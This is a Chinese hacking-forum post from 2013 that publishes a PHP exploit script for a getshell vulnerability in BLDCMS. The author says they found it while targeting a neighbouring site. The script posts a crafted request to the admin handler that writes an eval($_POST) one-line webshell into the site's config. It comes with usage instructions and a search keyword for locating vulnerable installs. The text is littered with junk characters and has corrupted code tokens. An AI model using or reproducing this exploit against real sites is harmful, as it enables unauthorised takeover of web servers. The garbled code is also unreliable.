之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞8 p! y" S1 L+ r E* g! K! ~
% E2 V3 l% A. j# \ 4 q. ^3 e9 ]! e( F, C
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
# u6 v* ]- _: }' r3 ~' [2 V 1 K6 Q% Q( o" g5 o& ~
既然都有人发了 我就把我之前写好的EXP放出来吧, l, M5 Y) L# k' }' l
, C; E4 p2 V2 w$ g+ y( j+ Wview source print?01.php;">% S% h4 @( U: X' _
02.<!--?php
1 t7 |" a, a9 R03.echo "-------------------------------------------------------------------
i# [. O6 j1 L) E4 d% T04.
! }# R6 W7 \' q! x2 I05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP l+ I5 A: h4 [
06. 3 u2 o i' B6 Q7 m3 l
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun) A3 b1 a8 t7 t% Q) B7 ?
08. + e& g. E' Z0 Y, f/ z4 U- ]9 N
09.QQ:981009941\r\n 2013.3.21\r\n 7 G& x5 i: J2 k
10. 3 i$ P) @, k2 N" E
11.
" A6 _2 G' B1 I, F9 `% b) B) @12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码) I/ n/ S& M3 W0 \' A8 K9 d6 P Y
13.
0 x ^/ C* {* L6 B5 e$ b14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------: l) d" h+ L A
15.
v. `4 h4 d. ~* J; n& L ^16.--------------------------------------------------------------------\r\n";- F e9 F7 v" T* d
17.$url=$argv[1];
3 c3 F) _3 u- Z* M) M8 t18.$dir=$argv[2];( n; Q* c" i5 q* U! s' s
19.$pass=$argv[3];. q3 o: z: Z& c5 ^! ~! A# i
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';+ W8 j; l- q4 G6 f
21.if (emptyempty($pass)||emptyempty($url)): J$ E' B7 a; ]0 s8 g
22.{exit("请输入参数");}4 w6 K& w: i* @/ E, y, K2 y' I$ a
23.else
& v/ W' R3 q0 v3 ?2 z9 u24.{
) l" {8 Z4 q2 L, f9 u8 m* L25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
. M1 x9 X" q2 d( Y* F26. ! Q) S. o' U: Z' J5 n7 r
27.al;" M/ M5 t, |) j, a0 Q. Z4 w, l$ o
28.$length = strlen($fuckdata);
" P0 R w1 K4 k- K9 [9 D29.function getshell($url,$pass)4 W# d j8 @: v) N
30.{" D0 B j5 M4 N/ ]9 e$ L
31.global $url,$dir,$pass,$eval,$length,$fuckdata;9 L" ?( s6 I4 H; x( V6 E k P* x
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
2 c$ e+ c, [4 B33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";: W/ P. c+ u3 F" V3 T$ M; t" h
34.$header .= "User-Agent: MSIE\r\n";
2 f/ l0 p/ o3 ? s, c4 x, v' g35.$header .= "Host:".$url."\r\n";
* `% V9 G/ V% B' ?# S. T36.$header .= "Content-Length: ".$length."\r\n";, m; y0 k( z: |9 Q) R; [6 O% B
37.$header .= "Connection: Close\r\n";& ]7 z- r2 p& Y5 F9 Y+ B. h/ R( R
38.$header .="\r\n";
2 q8 X6 m9 }: |39.$header .= $fuckdata."\r\n\r\n";
8 P+ t0 U# w: D! \. z$ p40.$fp = fsockopen($url, 80,$errno,$errstr,15);9 `, `+ {' S! H, n" U& _. ^8 Q% G
41.if (!$fp)# N+ j' [) ]9 x
42.{0 Q) H7 s2 u( n; F- `
43.exit ("利用失败:请检查指定目标是否能正常打开");
8 e) P$ r+ D8 U& y44.}. [% J8 k- i5 r+ S' ?+ S% i- y
45.else{ if (!fputs($fp,$header))& `3 Q( Y, T2 p+ c& ?; o
46.{exit ("利用失败");}
9 h$ a/ Q. ?$ B4 V: w, x2 w3 s47.else
4 ~ W4 \. i. Y4 \; U2 _/ U" z48.{
% ~* K* D8 e/ Z- v/ p$ v+ y49.$receive = '';
$ R1 c" Z4 i R50.while (!feof($fp)) {
* H' z( _6 l9 I q- q51.$receive .= @fgets($fp, 1000);
3 c, Q( M0 N# f a. ^2 ?0 R52.}
8 N" ^* a P# r8 E53.@fclose($fp);4 z) S4 O, `( T6 X; m, _9 c
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标; @( W: ^6 i |# ^
55.
5 C1 q! U6 N. j+ f. {9 b' t56.GPC是否=off)";( c7 H) p# G, t6 t( S
57.}}% R0 J {2 D& C: _
58.}
7 [& s; C& G0 Y! a8 m59.}
; v" W7 x6 F% k2 k60.getshell($url,$pass);
+ f _- G" k! R. g) P" s61.?-->3 {8 a! P0 c" Q& [
/ I( U4 R# C2 I0 u& v# I3 {% q" ]* _5 I8 `$ t3 v5 ?6 H
% @7 _* P* N5 ^! _+ i: ~% B0 y
by 数据流5 D# _; z0 S+ Z- _. W) S8 z7 ]
|
发表于 2013-3-26 20:49:10
收藏
支持
反对